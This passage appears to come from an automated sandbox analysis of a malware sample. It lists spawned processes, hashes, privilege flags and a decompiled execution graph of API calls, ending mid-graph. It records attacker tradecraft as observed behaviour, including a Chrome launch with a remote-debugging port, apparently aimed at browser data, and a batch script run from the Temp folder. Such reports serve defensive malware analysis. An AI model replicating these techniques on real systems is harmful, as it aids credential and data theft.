                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                                            Start time:16:17:45
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe"
                                                                                                                                                                                                                                                            Imagebase:0xcb0000
                                                                                                                                                                                                                                                            File size:2'752'512 bytes
                                                                                                                                                                                                                                                            MD5 hash:C682C12739CBB53B85334E649CF0B772
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                                            Start time:16:17:48
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe"
                                                                                                                                                                                                                                                            Imagebase:0xe0000
                                                                                                                                                                                                                                                            File size:1'861'632 bytes
                                                                                                                                                                                                                                                            MD5 hash:15709EBA2AFAF7CC0A86CE0ABF8E53F1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                                                            Start time:16:17:50
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                                                            Start time:16:17:50
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                                            Imagebase:0x7ff69b340000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                                                            Start time:16:17:50
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                                                            Start time:16:17:51
                                                                                                                                                                                                                                                            Start date:21/12/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:mode 65,10
                                                                                                                                                                                                                                                            Imagebase:0x7ff61dc00000
                                                                                                                                                                                                                                                            File size:33'280 bytes
                                                                                                                                                                                                                                                            MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:4%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:3.6%
                                                                                                                                                                                                                                                              Total number of Nodes:776
                                                                                                                                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                                                                                                                                              execution_graph 13863 bc9ab8 13865 bc9acc 13863->13865 13866 bc9b08 13865->13866 13867 bca917 13866->13867 13869 bc9b4b shared_ptr 13866->13869 13868 bca953 Sleep CreateMutexA 13867->13868 13873 bca98e 13868->13873 13870 bc5c10 6 API calls 13869->13870 13871 bc9b59 13869->13871 13872 bc9b7c 13870->13872 13880 bc8b30 13872->13880 13875 bc9b8d 13876 bc5c10 6 API calls 13875->13876 13877 bc9cb1 13876->13877 13878 bc8b30 6 API calls 13877->13878 13879 bc9cc2 13878->13879 13881 bc8b7c 13880->13881 13882 bc5c10 6 API calls 13881->13882 13883 bc8b97 shared_ptr std::future_error::future_error 13882->13883 13883->13875 13763 bca9f4 13772 bc9230 13763->13772 13765 bcaa03 shared_ptr 13766 bc5c10 6 API calls 13765->13766 13771 bcaab3 shared_ptr std::future_error::future_error 13765->13771 13767 bcaa65 13766->13767 13768 bc5c10 6 API calls 13767->13768 13769 bcaa8d 13768->13769 13770 bc5c10 6 API calls 13769->13770 13770->13771 13773 bc9284 shared_ptr 13772->13773 13774 bc944f shared_ptr 13773->13774 13775 bc5c10 6 API calls 13773->13775 13776 bc9543 shared_ptr std::future_error::future_error 13774->13776 13777 bc5c10 6 API calls 13774->13777 13779 bc979f shared_ptr 13774->13779 13775->13773 13776->13765 13777->13774 13778 bc98b5 shared_ptr std::future_error::future_error 13778->13765 13779->13778 13780 bc5c10 6 API calls 13779->13780 13781 bc9927 shared_ptr std::future_error::future_error 13780->13781 13781->13765 13925 bc4276 13926 bc2410 5 API calls 13925->13926 13927 bc427f 13926->13927 13785 bc8d30 13786 bc8d80 13785->13786 13787 bc5c10 6 API calls 13786->13787 13788 bc8d9a shared_ptr std::future_error::future_error 13787->13788 13837 bc2170 13840 bdc6fc 13837->13840 13839 bc217a 13841 bdc70c 13840->13841 13842 bdc724 13840->13842 13841->13842 13844 bdcfbe 13841->13844 13842->13839 13845 bdccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 13844->13845 13846 bdcfd0 13845->13846 13846->13841 13847 bcad70 13848 bcaddc shared_ptr 13847->13848 13850 bcaec0 shared_ptr std::future_error::future_error 13847->13850 13848->13850 13851 bf8ab6 13848->13851 13852 bf8ad1 13851->13852 13853 bf8868 4 API calls 13852->13853 13854 bf8adb 13853->13854 13854->13848 13884 bc42b0 13887 bc3ac0 13884->13887 13886 bc42bb shared_ptr 13888 bc3af9 13887->13888 13889 bc32d0 6 API calls 13888->13889 13891 bc3c38 13888->13891 13893 bc3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 13888->13893 13889->13891 13890 bc32d0 6 API calls 13894 bc3c5f 13890->13894 13891->13890 13891->13894 13892 bc3c68 13892->13886 13893->13886 13894->13892 13895 bc3810 4 API calls 13894->13895 13896 bc3cdb 13895->13896 13936 bc77b0 13937 bc77f1 shared_ptr 13936->13937 13938 bc5c10 6 API calls 13937->13938 13939 bc7883 shared_ptr 13937->13939 13938->13939 13940 bc5c10 6 API calls 13939->13940 13941 bc7953 shared_ptr std::future_error::future_error 13939->13941 13942 bc79e3 13940->13942 13943 bc5c10 6 API calls 13942->13943 13944 bc7a15 shared_ptr 13943->13944 13945 bc5c10 6 API calls 13944->13945 13950 bc7aa5 shared_ptr std::future_error::future_error 13944->13950 13946 bc7b7d 13945->13946 13947 bc5c10 6 API calls 13946->13947 13948 bc7ba0 13947->13948 13949 bc5c10 6 API calls 13948->13949 13949->13950 13951 bc87b0 13952 bc87b8 GetFileAttributesA 13951->13952 13953 bc87b6 13951->13953 13954 bc87c4 13952->13954 13953->13952 13955 bd47b0 13957 bd4eed 13955->13957 13956 bd4f59 shared_ptr std::future_error::future_error 13957->13956 13958 bc7d30 7 API calls 13957->13958 13959 bd50ed 13958->13959 13994 bc8380 13959->13994 13961 bd5106 13962 bc5c10 6 API calls 13961->13962 13963 bd5155 13962->13963 13964 bc5c10 6 API calls 13963->13964 13965 bd5171 13964->13965 14000 bc9a00 13965->14000 13995 bc83e5 __cftof 13994->13995 13996 bc5c10 6 API calls 13995->13996 13999 bc8403 shared_ptr std::future_error::future_error 13995->13999 13997 bc8427 13996->13997 13998 bc5c10 6 API calls 13997->13998 13998->13999 13999->13961 14001 bc9a3f 14000->14001 14002 bc5c10 6 API calls 14001->14002 14003 bc9a47 14002->14003 14004 bc8b30 6 API calls 14003->14004 14005 bc9a58 14004->14005 13556 bc87b2 13557 bc87b8 GetFileAttributesA 13556->13557 13558 bc87b6 13556->13558 13559 bc87c4 13557->13559 13558->13557 13286 bf6629 13289 bf64c7 13286->13289 13290 bf64d5 __cftof 13289->13290 13291 bf6520 13290->13291 13294 bf652b 13290->13294 13293 bf652a 13300 bfa302 GetPEB 13294->13300 13296 bf6535 13297 bf654a __cftof 13296->13297 13298 bf653a GetPEB 13296->13298 13299 bf6562 ExitProcess 13297->13299 13298->13297 13301 bfa31c __cftof 13300->13301 13301->13296 14006 bc9ba5 14007 bc9ba7 14006->14007 14008 bc5c10 6 API calls 14007->14008 14009 bc9cb1 14008->14009 14010 bc8b30 6 API calls 14009->14010 14011 bc9cc2 14010->14011 13497 bcb1a0 13498 bcb1f2 13497->13498 13499 bcb3ad CoInitialize 13498->13499 13500 bcb3fa shared_ptr std::future_error::future_error 13499->13500 13560 bc20a0 13563 bdc68b 13560->13563 13562 bc20ac 13566 bdc3d5 13563->13566 13565 bdc69b 13565->13562 13567 bdc3e1 13566->13567 13568 bdc3eb 13566->13568 13569 bdc39e 13567->13569 13570 bdc3be 13567->13570 13568->13565 13569->13568 13575 bdccd5 13569->13575 13579 bdcd0a 13570->13579 13573 bdc3d0 13573->13565 13576 bdc3b7 13575->13576 13577 bdcce3 InitializeCriticalSectionEx 13575->13577 13576->13565 13577->13576 13580 bdcd1f RtlInitializeConditionVariable 13579->13580 13580->13573 13789 bc4120 13790 bc416a 13789->13790 13792 bc41b2 Concurrency::details::_ContextCallback::_CallInContext std::future_error::future_error 13790->13792 13793 bc3ee0 13790->13793 13794 bc3f1e 13793->13794 13795 bc3f48 13793->13795 13794->13792 13796 bc3f58 13795->13796 13799 bc2c00 13795->13799 13796->13792 13800 bc2c0e 13799->13800 13806 bdb847 13800->13806 13802 bc2c42 13803 bc2c49 13802->13803 13812 bc2c80 13802->13812 13803->13792 13805 bc2c58 std::_Throw_future_error 13807 bdb854 13806->13807 13811 bdb873 Concurrency::details::_Reschedule_chore 13806->13811 13815 bdcb77 13807->13815 13809 bdb864 13809->13811 13817 bdb81e 13809->13817 13811->13802 13823 bdb7fb 13812->13823 13814 bc2cb2 shared_ptr 13814->13805 13816 bdcb92 CreateThreadpoolWork 13815->13816 13816->13809 13818 bdb827 Concurrency::details::_Reschedule_chore 13817->13818 13821 bdcdcc 13818->13821 13820 bdb841 13820->13811 13822 bdcde1 TpPostWork 13821->13822 13822->13820 13824 bdb817 13823->13824 13825 bdb807 13823->13825 13824->13814 13825->13824 13827 bdca78 13825->13827 13828 bdca8d TpReleaseWork 13827->13828 13828->13824 14020 bc3fe0 14021 bc4022 14020->14021 14022 bc408c 14021->14022 14023 bc40d2 14021->14023 14026 bc4035 std::future_error::future_error 14021->14026 14027 bc35e0 14022->14027 14024 bc3ee0 3 API calls 14023->14024 14024->14026 14028 bc3616 14027->14028 14032 bc364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 14028->14032 14033 bc2ce0 14028->14033 14030 bc369e 14031 bc2c00 3 API calls 14030->14031 14030->14032 14031->14032 14032->14026 14034 bc2d1d 14033->14034 14035 bdbedf InitOnceExecuteOnce 14034->14035 14036 bc2d46 14035->14036 14037 bc2d51 std::future_error::future_error 14036->14037 14038 bc2d88 14036->14038 14042 bdbef7 14036->14042 14037->14030 14040 bc2440 4 API calls 14038->14040 14041 bc2d9b 14040->14041 14041->14030 14043 bdbf03 std::_Throw_future_error 14042->14043 14044 bdbf6a 14043->14044 14045 bdbf73 14043->14045 14049 bdbe7f 14044->14049 14046 bc2ae0 5 API calls 14045->14046 14048 bdbf6f 14046->14048 14048->14038 14050 bdcc31 InitOnceExecuteOnce 14049->14050 14051 bdbe97 14050->14051 14052 bdbe9e 14051->14052 14053 bf6cbb 4 API calls 14051->14053 14052->14048 14054 bdbea7 14053->14054 14054->14048 14142 bcaf20 14143 bcaf63 14142->14143 14154 bf6660 14143->14154 14148 bf663f 4 API calls 14149 bcaf80 14148->14149 14150 bf663f 4 API calls 14149->14150 14151 bcaf98 __cftof 14150->14151 14160 bc55f0 14151->14160 14153 bcb04e shared_ptr std::future_error::future_error 14155 bfa671 __cftof 4 API calls 14154->14155 14156 bcaf69 14155->14156 14157 bf663f 14156->14157 14158 bfa671 __cftof 4 API calls 14157->14158 14159 bcaf71 14158->14159 14159->14148 14161 bc5610 14160->14161 14163 bc5710 std::future_error::future_error 14161->14163 14164 bc22c0 14161->14164 14163->14153 14167 bc2280 14164->14167 14168 bc2296 14167->14168 14171 bf87f8 14168->14171 14174 bf7609 14171->14174 14173 bc22a4 14173->14161 14175 bf7649 14174->14175 14176 bf7631 __cftof std::future_error::future_error 14174->14176 14175->14176 14177 bf690a __cftof 4 API calls 14175->14177 14176->14173 14178 bf7661 14177->14178 14180 bf7bc4 14178->14180 14182 bf7bd5 14180->14182 14181 bf7be4 __cftof 14181->14176 14182->14181 14187 bf8168 14182->14187 14192 bf7dc2 14182->14192 14197 bf7de8 14182->14197 14207 bf7f36 14182->14207 14188 bf8178 14187->14188 14189 bf8171 14187->14189 14188->14182 14216 bf7b50 14189->14216 14191 bf8177 14191->14182 14193 bf7dcb 14192->14193 14194 bf7dd2 14192->14194 14195 bf7b50 4 API calls 14193->14195 14194->14182 14196 bf7dd1 14195->14196 14196->14182 14198 bf7e09 __cftof 14197->14198 14201 bf7def 14197->14201 14198->14182 14199 bf7f69 14205 bf7f77 14199->14205 14206 bf7f8b 14199->14206 14224 bf8241 14199->14224 14200 bf7fa2 14200->14206 14220 bf8390 14200->14220 14201->14198 14201->14199 14201->14200 14201->14205 14205->14206 14228 bf86ea 14205->14228 14206->14182 14208 bf7f69 14207->14208 14210 bf7f4f 14207->14210 14211 bf8241 4 API calls 14208->14211 14214 bf7f77 14208->14214 14215 bf7f8b 14208->14215 14209 bf7fa2 14212 bf8390 4 API calls 14209->14212 14209->14215 14210->14208 14210->14209 14210->14214 14211->14214 14212->14214 14213 bf86ea 4 API calls 14213->14215 14214->14213 14214->14215 14215->14182 14217 bf7b62 14216->14217 14218 bf8ab6 4 API calls 14217->14218 14219 bf7b85 14218->14219 14219->14191 14222 bf83ab 14220->14222 14221 bf83dd 14221->14205 14222->14221 14232 bfc88e 14222->14232 14225 bf825a 14224->14225 14239 bfd3c8 14225->14239 14227 bf830d 14227->14205 14227->14227 14229 bf875d std::future_error::future_error 14228->14229 14231 bf8707 14228->14231 14229->14206 14230 bfc88e __cftof 4 API calls 14230->14231 14231->14229 14231->14230 14235 bfc733 14232->14235 14234 bfc8a6 14234->14221 14236 bfc743 14235->14236 14237 bf690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 14236->14237 14238 bfc748 __cftof 14236->14238 14237->14238 14238->14234 14242 bfd3ee 14239->14242 14247 bfd3d8 __cftof 14239->14247 14240 bfd485 14244 bfd4ae 14240->14244 14245 bfd4e4 14240->14245 14241 bfd48a 14252 bfcbdf 14241->14252 14242->14240 14242->14241 14242->14247 14248 bfd4cc 14244->14248 14249 bfd4b3 14244->14249 14269 bfcef8 14245->14269 14247->14227 14265 bfd0e2 14248->14265 14258 bfd23e 14249->14258 14253 bfcbf1 14252->14253 14254 bf690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 14253->14254 14255 bfcc05 14254->14255 14256 bfcef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 14255->14256 14257 bfcc0d __alldvrm __cftof _strrchr 14255->14257 14256->14257 14257->14247 14259 bfd26c 14258->14259 14260 bfd2a5 14259->14260 14261 bfd2de 14259->14261 14262 bfd2b7 14259->14262 14260->14247 14263 bfcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 14261->14263 14264 bfd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 14262->14264 14263->14260 14264->14260 14266 bfd10f 14265->14266 14267 bfd14e 14266->14267 14268 bfd16d GetPEB ExitProcess GetPEB RtlAllocateHeap 14266->14268 14267->14247 14268->14267 14270 bfcf10 14269->14270 14271 bfcf75 14270->14271 14272 bfcf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 14270->14272 14271->14247 14272->14271 13906 bc9adc 13909 bc9aea shared_ptr 13906->13909 13907 bca917 13908 bca953 Sleep CreateMutexA 13907->13908 13910 bca98e 13908->13910 13909->13907 13911 bc9b4b shared_ptr 13909->13911 13912 bc5c10 6 API calls 13911->13912 13913 bc9b59 13911->13913 13914 bc9b7c 13912->13914 13915 bc8b30 6 API calls 13914->13915 13916 bc9b8d 13915->13916 13917 bc5c10 6 API calls 13916->13917 13918 bc9cb1 13917->13918 13919 bc8b30 6 API calls 13918->13919 13920 bc9cc2 13919->13920 14012 bc3f9f 14013 bc3fad 14012->14013 14015 bc3fb6 14012->14015 14014 bc2410 5 API calls 14013->14014 14014->14015 13855 bc215a 13856 bdc6fc InitializeCriticalSectionEx 13855->13856 13857 bc2164 13856->13857 13302 bca856 13303 bca870 13302->13303 13304 bca892 shared_ptr 13302->13304 13303->13304 13306 bca94e 13303->13306 13309 bca8a0 13304->13309 13318 bc7d30 13304->13318 13308 bca953 Sleep CreateMutexA 13306->13308 13307 bca8ae 13307->13309 13310 bc7d30 7 API calls 13307->13310 13311 bca98e 13308->13311 13312 bca8b8 13310->13312 13312->13309 13313 bc7d30 7 API calls 13312->13313 13314 bca8c2 13313->13314 13314->13309 13315 bc7d30 7 API calls 13314->13315 13316 bca8cc 13315->13316 13316->13309 13317 bc7d30 7 API calls 13316->13317 13317->13309 13319 bc7d96 __cftof 13318->13319 13356 bc7ee8 shared_ptr std::future_error::future_error 13319->13356 13357 bc5c10 13319->13357 13321 bc7dd2 13322 bc5c10 6 API calls 13321->13322 13324 bc7dff shared_ptr 13322->13324 13323 bc7ed3 GetNativeSystemInfo 13325 bc7ed7 13323->13325 13324->13323 13324->13325 13324->13356 13326 bc7f3f 13325->13326 13327 bc8019 13325->13327 13325->13356 13329 bc5c10 6 API calls 13326->13329 13328 bc5c10 6 API calls 13327->13328 13330 bc804c 13328->13330 13331 bc7f67 13329->13331 13333 bc5c10 6 API calls 13330->13333 13332 bc5c10 6 API calls 13331->13332 13334 bc7f86 13332->13334 13335 bc806b 13333->13335 13367 bf8bbe 13334->13367 13337 bc5c10 6 API calls 13335->13337 13338 bc80a3 13337->13338 13339 bc5c10 6 API calls 13338->13339 13340 bc80f4 13339->13340 13341 bc5c10 6 API calls 13340->13341 13342 bc8113 13341->13342 13343 bc5c10 6 API calls 13342->13343 13344 bc814b 13343->13344 13345 bc5c10 6 API calls 13344->13345 13346 bc819c 13345->13346 13347 bc5c10 6 API calls 13346->13347 13348 bc81bb 13347->13348 13349 bc5c10 6 API calls 13348->13349 13350 bc81f3 13349->13350 13351 bc5c10 6 API calls 13350->13351 13352 bc8244 13351->13352 13353 bc5c10 6 API calls 13352->13353 13354 bc8263 13353->13354 13355 bc5c10 6 API calls 13354->13355 13355->13356 13356->13307 13358 bc5c54 13357->13358 13370 bc4b30 13358->13370 13360 bc5d17 shared_ptr std::future_error::future_error 13360->13321 13361 bc5c7b __cftof 13361->13360 13362 bc5da7 RegOpenKeyExA 13361->13362 13363 bc5e00 RegCloseKey 13362->13363 13365 bc5e26 13363->13365 13364 bc5ea6 shared_ptr std::future_error::future_error 13364->13321 13365->13364 13366 bc5c10 4 API calls 13365->13366 13491 bf8868 13367->13491 13369 bf8bdc 13369->13356 13372 bc4ce5 13370->13372 13373 bc4b92 13370->13373 13372->13361 13373->13372 13374 bf6da6 13373->13374 13375 bf6db4 13374->13375 13376 bf6dc2 __fassign 13374->13376 13379 bf6d19 13375->13379 13376->13373 13384 bf690a 13379->13384 13383 bf6d3d 13383->13373 13385 bf692a 13384->13385 13386 bf6921 13384->13386 13385->13386 13398 bfa671 13385->13398 13392 bf6d52 13386->13392 13393 bf6d8f 13392->13393 13394 bf6d5f 13392->13394 13483 bfb67d 13393->13483 13397 bf6d6e __fassign 13394->13397 13478 bfb6a1 13394->13478 13397->13383 13400 bfa67b __cftof 13398->13400 13399 bfa694 __cftof __freea 13402 bf694a 13399->13402 13417 bf8bec 13399->13417 13400->13399 13413 bfd82f 13400->13413 13405 bfb5fb 13402->13405 13406 bfb60e 13405->13406 13407 bf6960 13405->13407 13406->13407 13443 bff5ab 13406->13443 13409 bfb628 13407->13409 13410 bfb63b 13409->13410 13411 bfb650 13409->13411 13410->13411 13450 bfe6b1 13410->13450 13411->13386 13416 bfd83c __cftof 13413->13416 13414 bfd867 RtlAllocateHeap 13415 bfd87a 13414->13415 13414->13416 13415->13399 13416->13414 13416->13415 13418 bf8bf1 __cftof 13417->13418 13422 bf8bfc __cftof 13418->13422 13423 bfd634 13418->13423 13437 bf65ed 13422->13437 13425 bfd640 __cftof 13423->13425 13424 bfd69c __cftof 13424->13422 13425->13424 13426 bfd81b __cftof 13425->13426 13427 bfd726 13425->13427 13429 bfd751 __cftof 13425->13429 13428 bf65ed __cftof 3 API calls 13426->13428 13427->13429 13440 bfd62b 13427->13440 13430 bfd82e 13428->13430 13429->13424 13433 bfa671 __cftof 4 API calls 13429->13433 13435 bfd7a5 13429->13435 13433->13435 13434 bfd62b __cftof 4 API calls 13434->13429 13435->13424 13436 bfa671 __cftof 4 API calls 13435->13436 13436->13424 13438 bf64c7 __cftof 3 API calls 13437->13438 13439 bf65fe 13438->13439 13441 bfa671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13440->13441 13442 bfd630 13441->13442 13442->13434 13444 bff5b7 __cftof 13443->13444 13445 bfa671 __cftof 4 API calls 13444->13445 13447 bff5c0 __cftof 13445->13447 13446 bff606 13446->13407 13447->13446 13448 bf8bec __cftof 4 API calls 13447->13448 13449 bff62b 13448->13449 13451 bfa671 __cftof 4 API calls 13450->13451 13452 bfe6bb 13451->13452 13455 bfe5c9 13452->13455 13454 bfe6c1 13454->13411 13459 bfe5d5 __cftof __freea 13455->13459 13456 bfe5f6 13456->13454 13457 bf8bec __cftof 4 API calls 13458 bfe668 13457->13458 13460 bfe6a4 13458->13460 13464 bfa72e 13458->13464 13459->13456 13459->13457 13460->13454 13465 bfa739 __cftof 13464->13465 13466 bfd82f __cftof RtlAllocateHeap 13465->13466 13470 bfa745 __cftof __freea 13465->13470 13466->13470 13467 bf8bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13468 bfa7c7 13467->13468 13469 bfa7be 13471 bfe4b0 13469->13471 13470->13467 13470->13469 13472 bfe5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13471->13472 13473 bfe4c3 13472->13473 13474 bfe259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13473->13474 13475 bfe4cb __cftof 13474->13475 13476 bfe6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13475->13476 13477 bfe4dc __cftof __freea 13475->13477 13476->13477 13477->13460 13479 bf690a __cftof 4 API calls 13478->13479 13480 bfb6be 13479->13480 13482 bfb6ce std::future_error::future_error 13480->13482 13488 bff1bf 13480->13488 13482->13397 13484 bfa671 __cftof 4 API calls 13483->13484 13485 bfb688 13484->13485 13486 bfb5fb __cftof 4 API calls 13485->13486 13487 bfb698 13486->13487 13487->13397 13489 bf690a __cftof 4 API calls 13488->13489 13490 bff1df __cftof __fassign __freea std::future_error::future_error 13489->13490 13490->13482 13492 bf887a 13491->13492 13493 bf690a __cftof 4 API calls 13492->13493 13496 bf888f __cftof 13492->13496 13494 bf88bf 13493->13494 13495 bf6d52 4 API calls 13494->13495 13494->13496 13495->13494 13496->13369 13829 bdd111 13831 bdd122 13829->13831 13830 bdd12a 13831->13830 13833 bdd199 13831->13833 13834 bdd1a7 SleepConditionVariableCS 13833->13834 13836 bdd1c0 13833->13836 13834->13836 13836->13831 14016 bc2b90 14017 bc2bce 14016->14017 14018 bdb7fb TpReleaseWork 14017->14018 14019 bc2bdb shared_ptr std::future_error::future_error 14018->14019 14273 bc2b10 14274 bc2b1c 14273->14274 14275 bc2b1a 14273->14275 14276 bdc26a 5 API calls 14274->14276 14277 bc2b22 14276->14277 14055 bd87d0 14056 bd882a __cftof 14055->14056 14062 bd9bb0 14056->14062 14060 bd88d9 std::_Throw_future_error 14061 bd886c std::future_error::future_error 14075 bd9ef0 14062->14075 14064 bd9be5 14065 bc2ce0 5 API calls 14064->14065 14066 bd9c16 14065->14066 14079 bd9f70 14066->14079 14068 bd8854 14068->14061 14069 bc43f0 14068->14069 14070 bdbedf InitOnceExecuteOnce 14069->14070 14071 bc440a 14070->14071 14072 bc4411 14071->14072 14073 bf6cbb 4 API calls 14071->14073 14072->14060 14074 bc4424 14073->14074 14076 bd9f0c 14075->14076 14077 bdc68b __Mtx_init_in_situ 2 API calls 14076->14077 14078 bd9f17 14077->14078 14078->14064 14081 bd9fef shared_ptr 14079->14081 14083 bda058 14081->14083 14084 bda210 14081->14084 14082 bda03b 14082->14068 14085 bda290 14084->14085 14091 bd71d0 14085->14091 14087 bda2cc shared_ptr 14088 bda4be shared_ptr 14087->14088 14089 bc3ee0 3 API calls 14087->14089 14088->14082 14090 bda4a6 14089->14090 14090->14082 14092 bd7211 14091->14092 14099 bc3970 14092->14099 14094 bd7446 std::future_error::future_error 14094->14087 14095 bd72ad __cftof 14095->14094 14096 bdc68b __Mtx_init_in_situ 2 API calls 14095->14096 14097 bd7401 14096->14097 14104 bc2ec0 14097->14104 14100 bdc68b __Mtx_init_in_situ 2 API calls 14099->14100 14101 bc39a7 14100->14101 14102 bdc68b __Mtx_init_in_situ 2 API calls 14101->14102 14103 bc39e6 14102->14103 14103->14095 14105 bc2f7e GetCurrentThreadId 14104->14105 14106 bc2f06 14104->14106 14107 bc2f94 14105->14107 14124 bc2fef 14105->14124 14108 bdc6ac GetSystemTimePreciseAsFileTime 14106->14108 14114 bdc6ac GetSystemTimePreciseAsFileTime 14107->14114 14107->14124 14109 bc2f12 14108->14109 14110 bc2f1d __Mtx_unlock 14109->14110 14111 bc301e 14109->14111 14113 bc3024 14110->14113 14117 bc2f6f 14110->14117 14112 bdc26a 5 API calls 14111->14112 14112->14113 14116 bdc26a 5 API calls 14113->14116 14115 bc2fb9 14114->14115 14118 bdc26a 5 API calls 14115->14118 14119 bc2fc0 __Mtx_unlock 14115->14119 14116->14115 14117->14105 14117->14124 14118->14119 14120 bdc26a 5 API calls 14119->14120 14121 bc2fd8 __Cnd_broadcast 14119->14121 14120->14121 14122 bdc26a 5 API calls 14121->14122 14121->14124 14123 bc303c 14122->14123 14125 bdc6ac GetSystemTimePreciseAsFileTime 14123->14125 14124->14094 14133 bc3080 shared_ptr __Mtx_unlock 14125->14133 14126 bc31c5 14127 bdc26a 5 API calls 14126->14127 14128 bc31cb 14127->14128 14129 bdc26a 5 API calls 14128->14129 14130 bc31d1 14129->14130 14131 bdc26a 5 API calls 14130->14131 14139 bc3193 __Mtx_unlock 14131->14139 14132 bc31a7 std::future_error::future_error 14132->14094 14133->14126 14133->14128 14133->14132 14135 bc3132 GetCurrentThreadId 14133->14135 14134 bdc26a 5 API calls 14136 bc31dd 14134->14136 14135->14132 14137 bc313b 14135->14137 14137->14132 14138 bdc6ac GetSystemTimePreciseAsFileTime 14137->14138 14140 bc315f 14138->14140 14139->14132 14139->14134 14140->14126 14140->14130 14140->14139 14141 bdbd4c GetSystemTimePreciseAsFileTime 14140->14141 14141->14140 13581 bc3c8e 13582 bc3c98 13581->13582 13584 bc3ca5 13582->13584 13589 bc2410 13582->13589 13585 bc3ccf 13584->13585 13593 bc3810 13584->13593 13587 bc3810 4 API calls 13585->13587 13588 bc3cdb 13587->13588 13590 